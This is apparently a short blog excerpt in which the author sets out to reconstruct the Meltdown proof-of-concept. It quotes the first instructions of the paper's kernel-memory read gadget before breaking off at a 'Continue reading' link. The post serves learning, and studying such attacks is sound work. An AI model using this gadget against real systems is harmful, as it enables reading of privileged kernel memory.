Let’s see if I’ve got Metldown right
I thought I’d write down the proof-of-concept to see if I got it right.
So the Meltdown paper lists the following steps:
; flush cache ; rcx = kernel address ; rbx = probe array retry: mov al, byte [rcx] shl rax, 0xc … Continue reading Let’s see if I’ve got Metldown right